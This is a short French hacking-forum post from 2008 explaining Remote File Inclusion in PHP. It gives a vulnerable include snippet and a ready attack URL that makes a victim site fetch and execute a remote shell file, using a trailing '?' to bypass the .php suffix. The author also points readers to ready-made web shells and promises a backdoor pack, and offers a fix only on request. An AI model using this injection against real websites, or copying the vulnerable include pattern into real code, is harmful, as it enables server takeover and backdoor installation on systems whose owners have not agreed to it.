evolution-p2p Forum Index
 
 
 
evolution-p2p Forum IndexFAQSearchRegisterLog in
 

Logo Sonnerie Mobile
Sonneries et Logos les moins cher du web pour mobile
Meilleur Mobile .com
Leader de la vente de mobiles opérateurs au meilleur prix !
Rachat crédit immobilier
Comparez les taux, obtenez les taux bas pour votre crédit
Liens sponsorisés

les failles RFI

 
Post new topic   Reply to topic    evolution-p2p Forum Index -> [Administration réseaux] -> Codage
Previous topic :: Next topic  
Author Message
 dreck
 touriste
 touriste
 
Offline

 Joined: 12 Apr 2008
 Posts: 4
 

 PostPosted: Sat 12 Apr - 04:42    Post subject: les failles RFI Reply with quote

Hello all,

Je voulais vous expliquer un peut la faille RFI Remote File Inclusion.
ATTENTION cette faille n'est pas à confondre avec la faille php include !!
Donc RFI c'est un peut comme la faille include car on inclue une url à la fin de l'url victime!!!

bref imaginez ce code :

$page=$_GET['page'];
include($page.".php");

le php peut inclure n'importe quoi même un fichier distant (shells, backdoor etc...)

http://www.victime.com/index.php?page=http://www.notresite.com/shell.txt?

le "?" Sert à faire tomber le php dans l'include.
Le contenu du fichier sera interpréter sur notre serveur et exécuter !!!
Je vous laisse imaginez ce qu'ont peut faire ensuite !!!
Vous pouvez utiliser les shells de egosentrik. Sinon je ferais un pack de shells et backdoor que je métrais à votre dispo dans la section téléchargement.

sur ce @++

P.S : si vous souhaitez savoire comment reparer la faille dite moi je vous expliqsuerais Wink
 Back to top
Display posts from previous:   
Post new topic   Reply to topic    evolution-p2p Forum Index -> [Administration réseaux] -> Codage All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  

Portal | Index | Getting a forum | Support forum | Forum directory | Legal notices
Template SoftLight created by larme d'ange
Powered by phpBB © 2001, 2005 phpBB Group